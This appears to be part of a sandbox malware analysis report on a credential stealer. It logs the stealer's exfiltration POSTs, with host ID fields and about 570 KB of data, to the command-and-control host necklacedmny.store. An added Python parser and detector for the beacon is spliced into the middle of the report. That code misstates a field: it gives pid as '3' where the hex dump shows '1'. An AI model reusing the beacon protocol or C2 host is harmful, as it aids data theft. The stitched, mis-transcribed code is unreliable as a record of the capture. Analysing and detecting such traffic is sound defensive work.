                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1267&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20932&delivery_rate=2260733&cwnd=235&unsent_bytes=0&cid=5294a40fe0e0d7d1&ts=872&x=0"
                                                                      2024-10-30 07:22:17 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.6 | 49736 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-10-30 07:22:18 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1222
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:18 UTC1222OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:19 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ibcn57o6cbmtjhbdtl560kho7u; expires=Sun, 23 Feb 2025 01:08:57 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6oTpNnbRB0PtJgURrC1P%2FgQufaX62lWKqe1zfj8WRMOmFyrSMDHa2BErU0p6%2F5FPTc8KTe8tjQP5Pczm0VcyHW6KFAeBNjdnZttK0P3LqLnEhxryjBNk70JYflTgDqVBYK99AM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a7499dd1e7af-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2059&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2141&delivery_rate=1402421&cwnd=78&unsent_bytes=0&cid=e8325383e7ada134&ts=748&x=0"
                                                                      2024-10-30 07:22:19 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 07:22:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | 1408 | C:\Users\user\Desktop\file.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-10-30 07:22:20 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 571731
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 36 30 31 35 39 38 31 38 39 39 46 45 32 44 34 44 35 31 38 34 33 34 33 35 39 31 30 43 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF6015981899FE2D4D51843435910C17--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ea 4d d0 58 df 04 66 01 c5 4f 02 c5 dd 46 09 31 8a 81 37 2d 8d 1c 3a 11 fb b1 4f b6 4f 08 9c 4d 4a 77 f2 c0 81 66 a5 8d 20 53 74 ac 44 96 53 39 a4 a8 0e 53 25 f8 a5 da c8 e4 fb 98 1a 1e ff 09 21 a5 dd b2 3e ce 5c 28 66 14 4a 78 b1 3c a5 ce 9b de 7f 8f 5a 6d a1 a0 35 0c cb f7 96 02 1b 77 de cf d2 32 4c f1 29 cc 3c 25 6d b3 39 d0 4d 89 d5 e0 2c ca 25 ad 2a d5 8e be c9 f0 e5 e4 0b 91 49 34 c4 9f 08 6e c8 ae 7e bb 09 1b 4a 14 3e 0d 37 c2 c2 fe bf 20 f6 e6 47 51 e5 cf 6a 35 03 22 79 20 71 69 8c 39 f9 f9 12 df 57 a5 a4 2e 2c b7 e1 83 fa 05 24 a0 a1 52 bc d0 af 24 b4 a0 96 81 d2 c9 c9 2e f1 7b 7d 21 0c d9 df b6 8b d9 34 ad d0 de 7a c0 9f d6 c7 cc a9 71 53 0a 39 cb 8a 6c b1 8d 25 93 f6 07 ea bc cf d3 9a 63 ca ee e0 2b 64 15 43 46 2c 39 38 b1 65 df 08 5d 1a 22 3b
                                                                      Data Ascii: MXfOF17-:OOMJwf StDS9S%!>\(fJx<Zm5w2L)<%m9M,%*I4n~J>7 GQj5"y qi9W.,$R$.{}!4zqS9l%c+dCF,98e]";
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 7c 52 da f1 a4 dd 9a e9 d4 b3 76 7e 43 e8 df 99 cf 50 b5 b2 a4 53 8b 96 da bc 14 4f ed 1d 81 5c 68 f2 4b b5 bb 3b eb 75 b1 b5 52 44 e5 e8 9f ed ff 2f 3c 6c 3e 53 88 54 ad bb bc ab b3 9a ee dc 22 a6 f9 67 53 d9 a5 d3 53 2a 47 8c 09 84 1d 5e ef b5 12 48 2b 69 43 77 03 6f f7 d3 e3 14 04 93 ef 42 46 1a 28 d5 42 b5 4e b7 87 bd 66 87 a2 03 8a 82 a3 62 82 9c 11 c8 6a 12 a6 19 61 d9 14 5e 4a c0 b0 24 7b 1e b5 ad aa 25 df ad 33 19 44 fa 37 e1 6a a3 5d e6 f3 78 ee e3 0a 51 08 59 a5 db 3d cf a4 08 10 c6 94 1d e9 51 a1 71 eb 6f 3e 7b 6f 09 2b 53 5f fb 1c ea 83 de 3e 5a bd 43 b1 74 33 69 9b 4a 14 7c 63 52 65 38 c2 3e 37 8c 65 62 b7 7e 8f 6e fd a3 29 c1 69 07 6a ab ba ed 96 66 fe f8 a4 de 90 f3 fb bd 81 32 a3 6b 1e 81 b3 6f df 57 fe 79 50 c2 e6 4c 2f 7f 5e 39 59 67 50
                                                                      Data Ascii: |Rv~CPSO\hK;uRD/<l>ST"gSS*G^H+iCwoBF(BNfbja^J${%3D7j]xQY=Qqo>{o+S_>ZCt3iJ|cRe8>7eb~n)ijf2koWyPL/^9YgP
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 40 52 56 c0 ef 26 3a 5f 75 ea b7 c9 e1 e5 9c b6 f3 9a 57 71 89 e2 07 9f 4f d2 53 97 0a ff ac 41 19 5d c5 1e 38 ca cb 43 3a c7 d2 9a 97 49 8b e7 6f 4c ec 8c 3f 9e ab d7 78 9e 1b 74 d2 22 47 f8 1f 2a 71 5d 69 b4 19 13 d0 f1 d2 64 42 36 dc 8d 66 50 38 3a 56 03 b3 5f 61 3c 7a 75 29 c0 b1 be 49 cd 30 60 9a 9b 3b e4 ec b4 fb 23 61 56 f6 aa f2 28 af 8c a9 d8 4c a2 6a ac 78 71 58 aa 8b 9d 1e dc 66 37 e5 de 11 87 52 01 f0 ce 94 a7 a9 f6 79 5f 48 47 f0 e6 3a 8d 2d de c1 32 5f 4c 18 f3 dc 59 f9 f0 d3 b5 08 2f 2e 35 c8 73 52 95 01 4e 7b d5 f6 2d bd 5d c3 76 85 86 c6 f3 82 1d 79 f2 9b ac 57 62 1f 10 77 0b ce 48 91 0f 1d 41 51 8f 4b 41 e1 1b eb 03 cd 5d f1 af 0f 92 69 92 9b 71 48 f0 ae 23 84 20 06 98 67 94 ef a5 69 b1 f4 79 7d 95 cf 7e d0 47 47 76 9c a4 61 c1 67 c1 d7
                                                                      Data Ascii: @RV&:_uWqOSA]8C:IoL?xt"G*q]idB6fP8:V_a<zu)I0`;#aV(LjxqXf7Ry_HG:-2_LY/.5sRN{-]vyWbwHAQKA]iqH# giy}~GGvag
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 87 2b a1 80 7d c8 8c d2 f8 83 e4 19 b7 63 36 8a 14 d8 bc 43 77 9e 08 f1 7b a2 20 00 bb 6f d6 46 14 d7 f6 34 89 f0 c8 51 fc 5b 97 84 5f 94 19 91 03 b7 21 27 3c 38 30 22 f0 93 5b e8 c3 75 6f ed 68 e2 4c de e5 3b d9 a0 26 70 64 61 e8 53 46 10 24 41 98 d0 ad a8 3a 1b 6f 19 d9 89 34 9c c4 aa a0 c2 ef 13 26 9f 73 69 42 37 b0 dd a1 7c ec b1 89 3f d2 50 e7 b0 de c5 75 84 f7 9e f4 ba e8 ff bd f1 d7 21 35 0b 83 26 fd a9 76 2f 90 7e fe 86 98 2d 22 7d 63 43 59 56 79 74 0a f6 4c ce 2f d6 1d 53 c5 f1 09 1f 7f f8 4e f8 c4 76 2d d9 98 ee 77 a2 52 63 0e 61 a2 7c 42 25 e8 a7 b1 24 90 3c 2e 9a f0 ff 0f d6 ff 2d 66 f4 36 f0 ae 18 e9 b6 35 89 fc 23 a1 a5 a6 fc 08 32 59 8b 9d 97 06 bf 36 d0 fd 85 1e 09 59 3e d8 c8 c3 83 f5 15 27 27 e4 02 19 3b b3 7f 24 02 00 3e 8e 0a 38 95 fb
                                                                      Data Ascii: +}c6Cw{ oF4Q[_!'<80"[uohL;&pdaSF$A:o4&siB7|?Pu!5&v/~-"}cCYVytL/SNv-wRca|B%$<.-f65#2Y6Y>'';$>8
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ca e7 6a 79 38 f3 ad 9e f8 33 dd 6a ad 7a 8d de ae 11 5b 7e 0d c6 ee c3 76 7c 8f 0f d1 7b b2 9d 1c 3a 53 3b a9 f3 37 44 80 d5 58 9a 86 c5 4b 2b 84 6e 0b 6f 59 22 aa 2b ee 0c ac b0 76 e8 c4 fd a4 5a 17 9b 16 47 44 c5 84 46 0a 73 5e fd 4b 6c 23 0e 35 9a 8e 34 24 8a 7d c8 ba 1d 6d 96 04 3a a0 89 82 8b a2 e5 b7 f1 eb d1 c4 d4 8f f2 96 38 f8 9d 20 9e 31 33 ce 87 50 23 12 fb 50 24 25 40 3f 66 f0 bf 48 bb fb df c6 4a 4d 12 c4 7e ef aa c3 8c 90 d8 a1 c3 44 4b 30 74 8c 00 e0 68 00 9a 22 7a 05 cc 3f 6a 6f f7 d4 79 70 1c 38 bd b8 29 e9 d4 af 8b a0 6d 23 29 34 35 88 0b 75 dd 3d c4 08 0b 12 1c 04 f7 eb 28 12 80 c1 1b bd 78 6b be 55 06 4c 5c 58 d7 66 b5 0b 4f d2 70 28 29 cc 5f 98 68 10 e5 b0 40 d9 91 6a 61 ee 5e 7e d6 13 ff 97 8c d2 75 e7 ee b9 3f 4a 35 23 07 7f dd d1
                                                                      Data Ascii: jy83jz[~v|{:S;7DXK+noY"+vZGDFs^Kl#54$}m:8 13P#P$%@?fHJM~DK0th"z?joyp8)m#)45u=(xkUL\XfOp()_h@ja^~u?J5#
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 6f 90 fc 43 89 fb 56 b0 81 e1 b1 cc a2 d6 da 2a d9 3f b7 a1 a8 a9 4c 89 71 02 7e e1 68 79 d3 59 09 25 b9 31 b7 51 95 77 d7 d2 b2 65 53 88 e0 2b 94 bf 04 a0 ef e5 36 c1 99 48 42 5c 32 2f f7 fc 9d 76 9e 7c 7e 3b 99 73 fa fe 46 7c 56 d2 84 6e 35 2b 2b 3e eb 75 32 55 04 e4 7d fd 1e 91 3e 6c 63 40 1e fd 00 87 f8 e0 cb 8e 31 b5 d6 69 17 09 56 f7 9b 83 f0 92 0e e5 cf 92 aa 63 43 13 b0 a3 aa c0 7e b5 e4 4e 7d 85 e0 05 a0 9a c6 64 e5 cc 30 af f2 49 dd 7a b7 52 c7 fb dd 44 79 80 6f c8 4d a1 12 af 9c 27 c3 d1 7b 94 5f 89 82 47 06 33 ab 75 2d 48 ef 31 b4 f8 eb 5b 7b 8d 71 58 a8 75 d8 ea 6c 90 1e 9b 25 f8 9c c5 d2 e0 7d 58 24 6d e4 e6 af ad 09 a4 f6 eb d6 e8 f2 53 66 39 ee fd dd d3 4a 8f 71 b7 88 43 eb ec 2c 85 55 77 61 41 e6 46 0e 3a ba 3e 51 c9 ae f0 9f 7f fe 75 03
                                                                      Data Ascii: oCV*?Lq~hyY%1QweS+6HB\2/v|~;sF|Vn5++>u2U}>lc@1iVcC~N}d0IzRDyoM'{_G3u-H1[{qXul%}X$mSf9JqC,UwaAF:>Qu
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: ea 23 12 3f b4 61 13 d8 fc ac 04 b6 83 64 bf 32 4d 4f 88 dd 1b 9c da 98 07 a1 9c 64 c1 dc fd d2 80 d2 60 76 4b b7 73 84 d9 38 d4 90 f8 08 c9 65 af 36 13 cb a2 d9 e7 7e 00 fc 5c b5 c6 41 35 aa 8f 7f d4 4b 76 bb f2 f2 ae 84 0c 28 43 a0 04 53 d2 ad c2 b2 86 48 ac 47 77 24 35 d8 27 04 66 8b aa 8f b2 0c 0d ae be 54 7b 80 a4 8a 74 be da c2 16 56 ef df 18 8a 1d d3 3a ac 3b 36 24 4c 90 a2 ef 93 be 0b 65 10 37 5e 53 04 26 5c 05 c6 14 b0 9c dc c2 21 ed d1 8e 9a d3 c1 4e 3a 44 3c d0 d4 10 fe 8b 97 82 3f 3d 28 f8 24 92 6f 8e c8 09 53 de a4 07 b1 cd d9 e9 cb 21 31 35 ef 53 25 9a 51 58 c2 63 6a a5 6a 68 f3 2d ad a7 11 c5 7a 91 82 6d 41 df 7c 3e 04 2d 72 02 4f 6d 9c fd 0f a9 59 a6 b0 51 5e 4c a4 4e b7 8e 26 dd ca fe dd 62 5d 38 bf 62 b9 77 e8 7a be a1 4e 18 e3 cb 23 3e
                                                                      Data Ascii: #?ad2MOd`vKs8e6~\A5Kv(CSHGw$5'fT{tV:;6$Le7^S&\!N:D<?=($oS!15S%QXcjjh-zmA|>-rOmYQ^LN&b]8bwzN#>
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 52 f2 b7 81 a4 58 f1 cc 7b 74 c9 ff 1a a5 3b 62 60 47 69 9d ff 0f 4d 3c 8c aa fc 94 50 1c bf 2b b9 41 f5 ae 69 70 5a 61 55 e6 3e 9c 55 0a a3 62 55 20 c6 c1 77 1c df d1 43 eb e9 a7 0b d5 f1 d7 68 5a 53 da af e6 9f ac 91 c3 e1 25 d3 69 85 83 2d e6 41 8c e6 a2 63 eb 13 e7 be 73 a3 8c a3 01 08 2b 7a f9 ad c6 f5 7f 47 e5 d7 11 74 69 c2 80 38 80 e1 f0 9d 09 d2 5e ed 58 67 ea 3b 40 e6 65 1f 4b 4e 4d 81 f1 9b 8b b2 9a 05 bf f8 e9 81 ff 9c 22 7d 0e 4b 0a 51 17 8d 60 58 49 90 9d 88 73 ed a6 a8 ee 48 fa 59 54 aa 1f 1b ff 07 dd 1f 05 b6 44 d9 ed 52 92 01 1d 75 a7 57 95 14 fe 39 93 1a c7 3c ed f0 33 52 58 e6 80 e0 37 45 f9 74 aa ff f6 e9 8a 71 23 34 97 ad a6 6d 59 82 9c 03 d5 bd f8 b4 1b 68 c1 d6 31 7a 6b 19 90 5a 45 4f 9a f5 a7 78 93 5a 78 7f 9f ae 71 51 5d 6a d2 a3
                                                                      Data Ascii: RX{t;b`GiM<P+AipZaU>UbU wChZS%i-Acs+zGti8^Xg;@eKNM"}KQ`XIsHYTDRuW9<3RX7Etq#4mYh1zkZEOxZxqQ]j
                                                                      2024-10-30 07:22:20 UTC15331OUTData Raw: 8f cc 66 90 3b 31 57 fd 61 dd e7 1b 94 b3 cc c6 31 3f 4e 3e 3f 11 86 05 0a f4 21 c1 58 23 d9 4c f9 61 85 e7 f4 12 2c be 31 47 73 cd 5d 28 51 0a e7 24 75 0c 58 61 c9 98 b9 c3 0d 43 6d d0 db da 7b 13 0e b1 06 6d 3b bd 68 76 ad 1d 62 7b 2a ba c5 61 27 16 84 c8 f9 65 13 ce 26 d1 54 5d 8d 92 ed a5 80 39 4b d9 e0 69 b6 90 28 21 53 67 f3 d6 49 0f 70 d1 32 b3 6c 49 14 70 9d ee f7 ae 91 46 fa 40 6f c6 26 cb f5 6d 08 f5 75 aa 26 94 61 6a ac bf 8d 5f 2e 22 17 5c 08 fa f2 43 f8 a6 d2 3e d6 cf 47 54 54 94 fa 01 9e 2d 34 bb 7d 67 40 11 53 a5 f2 2a 4a f7 17 8a bf 20 76 04 8f a8 fa 20 05 a3 22 a3 e3 74 44 4e ec a4 64 38 14 0e f6 47 8d 54 05 80 7d 13 6c 1e b0 87 c5 fd 67 f1 c9 05 dc ed 9c 66 4f 64 3e e1 df 19 77 7d 8d 31 34 b6 5c 3d da cf 2f c4 19 e7 e4 b7 1c d8 46 06 ad
                                                                      Data Ascii: f;1Wa1?N>?!X#La,1Gs](Q$uXaCm{m;hvb{*a'e&T]9Ki(!SgIp2lIpF@o&mu&aj_."\C>GTT-4}g@S*J v "tDNd8GT}lgfOd>w}14\=/F
                                                                      2024-10-30 07:22:21 UTC | 1031 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=covoedllqs2gi005e0salnhnrl; expires=Sun, 23 Feb 2025 01:09:00 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyjjPBOQPrsP6rPZg492%2FYcMW2wO0ZQ6l1Q5Ao6HBurTOj%2Fe9%2B0eu0D%2BB8wG6kWZSH7UGSKdIK%2BEAY7zXPe2VoV4hp%2Fs%2BG5Y0PCdZNebZLSyjOOUD7wwlP61kY%2FL9jaBGLspIRI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a754bf98e70a-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1509&sent=219&recv=613&lost=0&retrans=0&sent_bytes=2846&recv_bytes=574280&delivery_rate=1895287&cwnd=243&unsent_bytes=0&cid=531f9f7d2d863e21&ts=1817&x=0"
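
The sessions above all show the same exchange: a multipart/form-data POST to /api on necklacedmny.store carrying parts named hwid, pid and lid (session 6 then streams roughly 570 KB of opaque data in further parts), answered by a chunked body that reads "ok" followed by an IPv4 address. The following Python is an added example and not code from the Joe Sandbox report or from the malware: it reconstructs the leading bytes of the request body from the report's own "Data Raw" hex dump, parses the form parts while refusing to trust the part the dump cuts off, decodes the chunked reply, and wraps both in a heuristic matcher for this traffic pattern. The byte strings are constructed from the dump; that hwid is a host identifier and that the returned address is the sender's public IP as seen by the server are assumptions, not statements the report makes.

```python
"""Parse the LummaC C2 beacon recorded in the sessions above.

Added example, not code from the Joe Sandbox report or from the malware. The
boundary, part names and values are transcribed from the report's "Data Raw"
hex dump; the byte strings below are constructed from that dump.
"""
from __future__ import annotations

import re

BOUNDARY = "be85de5ipdocierre1"  # from the Content-Type header in the report

# Leading bytes of the captured POST body, reconstructed from the hex dump of
# session 5's first chunk. The sandbox truncates the dump, so the third part
# ("lid") is cut off mid-value and must not be treated as complete.
CAPTURED_BODY = (
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"DF6015981899FE2D4D51843435910C17\r\n"
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"3\r\n"
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"4SD0y4--legen"  # the dump ends here
)

# Chunked reply body from the same session (hex 31 31 0d 0a 6f 6b 20 ... 0d 0a 30 0d 0a 0d 0a).
CAPTURED_REPLY = b"11\r\nok 173.254.250.78\r\n0\r\n\r\n"

_NAME_RE = re.compile(rb'name="([^"]+)"')
_OK_RE = re.compile(rb"^ok (\d{1,3}(?:\.\d{1,3}){3})$")


def parse_multipart(body: bytes, boundary: str) -> tuple[dict[str, bytes], list[str]]:
    """Split a multipart/form-data body into {part name: value}.

    Returns (fields, truncated). A part is stored in `fields` only if a
    following delimiter terminated it; the name of a part that runs off the
    end of the capture goes into `truncated`, so a half-read value is never
    mistaken for the real one.
    """
    delim = b"--" + boundary.encode()
    fields: dict[str, bytes] = {}
    truncated: list[str] = []
    parts = body.split(delim)  # parts[0] is the preamble (empty here)
    for i, part in enumerate(parts[1:], start=1):
        if part.startswith(b"--"):
            break  # "--boundary--": closing delimiter, nothing follows
        head, sep, value = part.removeprefix(b"\r\n").partition(b"\r\n\r\n")
        m = _NAME_RE.search(head)
        if not sep or not m:
            continue  # no header/body separator or no name: malformed part
        name = m.group(1).decode()
        if i == len(parts) - 1:
            truncated.append(name)  # no delimiter closed this part
        else:
            fields[name] = value.removesuffix(b"\r\n")
    return fields, truncated


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-encoded body.

    Each chunk is "<hex size>[;ext]\\r\\n<data>\\r\\n"; a zero-size chunk ends
    the body. Raises ValueError on a malformed or truncated stream instead of
    silently returning a partial body.
    """
    out, pos = bytearray(), 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(raw[pos:end].split(b";", 1)[0].strip(), 16)
        pos = end + 2
        if size == 0:
            return bytes(out)
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def reply_ip(reply: bytes) -> str | None:
    """Return the dotted quad from an "ok <ip>" reply, or None if it is not one."""
    m = _OK_RE.match(decode_chunked(reply))
    return m.group(1).decode() if m else None


def looks_like_lumma_beacon(method: str, path: str, headers: dict[str, str],
                            body: bytes, reply: bytes) -> bool:
    """Heuristic for the exchange recorded in this report.

    Matches POST /api with a multipart/form-data body whose parts include
    hwid (32 upper-case hex chars), pid and lid, answered by a chunked
    "ok <ipv4>". Tuned to the sessions above: a starting point for a rule,
    not a general signature.
    """
    if method != "POST" or path != "/api":
        return False
    ctype = headers.get("Content-Type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return False
    fields, truncated = parse_multipart(body, m.group(1))
    if not {"hwid", "pid", "lid"} <= set(fields) | set(truncated):
        return False
    if not re.fullmatch(rb"[0-9A-F]{32}", fields.get("hwid", b"")):
        return False
    try:
        return reply_ip(reply) is not None
    except ValueError:
        return False


if __name__ == "__main__":
    fields, truncated = parse_multipart(CAPTURED_BODY, BOUNDARY)
    print("complete parts:", {k: v.decode() for k, v in fields.items()})
    print("truncated parts:", truncated)
    print("server reply:", decode_chunked(CAPTURED_REPLY).decode())
```

Run against the reconstructed capture, the parser yields hwid and pid as complete parts and reports lid as truncated rather than returning the cut-off value, and the reply decodes to a single 17-byte chunk. The matcher keys on the request shape and the "ok <ip>" reply together; neither the Chrome User-Agent nor the Cloudflare front end is distinctive on its own.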



                                                                      Target ID:0
                                                                      Start time:03:22:06
                                                                      Start date:30/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x6a0000
                                                                      File size:2'958'848 bytes
                                                                      MD5 hash:65AF596C495031434154EBB5E6EB462F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      No disassembly